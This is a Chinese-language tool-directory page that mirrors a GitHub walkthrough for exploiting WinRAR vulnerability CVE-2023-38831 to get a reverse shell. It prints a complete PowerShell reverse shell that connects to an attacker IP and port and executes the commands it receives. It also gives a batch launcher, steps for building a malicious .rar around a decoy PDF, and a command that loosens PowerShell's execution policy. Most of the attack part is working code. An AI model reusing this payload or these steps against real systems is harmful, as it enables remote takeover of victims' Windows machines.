Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-38831_ReverseShell_Winrar-RCE — 利用winrar CVE-2023-38831漏洞(影响6.23之前版本)获取反向shell所需的步骤。 | Kitploit
工具/GitHubGitHub/maalfer/cve-2023-38831_reverseshell_winrar-rce
漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发实验室与实践
GitHubmaalfer/cve-2023-38831_reverseshell_winrar-rce

CVE-2023-38831_ReverseShell_Winrar-RCE

利用winrar CVE-2023-38831漏洞(影响6.23之前版本)获取反向shell所需的步骤。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
22843年前Kitploit 审核通过

利用WINRAR漏洞CVE-2023-38831获取反向Shell

在本仓库中,我们将利用WinRAR的CVE-2023-38831漏洞,从而从受害Windows机器获取反向Shell到攻击者Kali Linux机器。

前期步骤

下载本仓库的内容:

imagen

接下来,我们需要安装必要的Python依赖,以便利用以下命令利用此漏洞:

root@kitploit:~
pip install rarce

imagen

准备工作

我们将执行一个恶意代码,从 revshells.com 获取反向Shell(提供相应的攻击者IP和端口):

https://www.revshells.com/

imagen

root@kitploit:~
$LHOST = "192.168.0.36"; $LPORT = 443; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

将此PowerShell代码保存为.ps1文件(稍后将执行):

imagen

获取用于反向Shell的ps1代码后,我们创建一个Python文件,通过使用os库来执行.ps1文件:

imagen

然后,我们创建一个包含以下代码的.bat文件:

imagen

root@kitploit:~

rem Ruta al ejecutable de Python
set PYTHON_EXECUTABLE=python.exe

rem Ruta al script de Python que deseas ejecutar
set PYTHON_SCRIPT=pwned.py

rem Ejecutar el script de Python
%PYTHON_EXECUTABLE% %PYTHON_SCRIPT%

rem Pausa para que puedas ver la salida antes de que se cierre la ventana
pause

利用过程

此时,我们需要创建恶意的WinRAR文件:

imagen

运行.rar内的documento.pdf文件:

imagen

imagen

最后,如果在攻击者机器上使用netcat保持监听,我们将收到反向Shell:

imagen

可能错误的解决方案:

如果无法执行PowerShell命令,需要在系统上启用脚本执行:

imagen

imagen

我们启用它:

imagen

然后执行以下命令:

Set-ExecutionPolicy RemoteSigned -Scope CurrentUser

下载工具